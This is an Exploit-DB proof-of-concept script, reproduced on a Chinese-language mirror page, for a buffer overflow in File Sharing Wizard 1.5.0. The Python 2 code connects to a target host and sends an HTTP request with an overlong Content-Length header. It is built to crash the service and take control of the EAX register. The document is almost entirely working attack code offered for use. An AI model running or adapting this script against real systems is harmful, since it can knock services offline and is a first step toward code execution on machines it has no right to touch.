File Sharing Wizard 1.5.0 – Buffer Overflow (PoC)

  • 作者: m-1-k-3
    日期: 2010-06-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/13876/
  • #!/usr/bin/python
    
    # http://www.sharing-file.net/
    # File Sharing Wizard Version 1.5.0 build on 26-8-2008
    #
    # controlling EAX
    # ESP points to our buffer
    # buffer grows if we increase our string
    #
    # more details on http://www.s3cur1ty.de
    # have fun m1k3 [at] m1k3 [dot] at
    
    import socket
    import sys
    
    if len(sys.argv) < 2:
    print "Usage: vrfy.py <IP-Adr> <port>"
    sys.exit(1)
    
    ips = sys.argv[1]
    port = int(sys.argv[2])
    
    
    string = "A"*51
    string += "B"*4 #controlling eax
    string += "C"*500
    
    header = "Content-Length"
    
    print "starting the attack for:", ips
    print ""
    
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
    connect=s.connect((ips, port))
    except:
    print "no connection possible"
    sys.exit(1)
    
    print "\r\nsending payload"
    print "..."
    payload = (
    'GET http://%s/ HTTP/1.0\r\n'
    '%s: %s\r\n'
    '\r\n') % (ips,header,string)
    
    s.send(payload)
    s.close()
    
    print "finished kicking device %s" % (ips)
    print "... the service should be crashed ... check eax"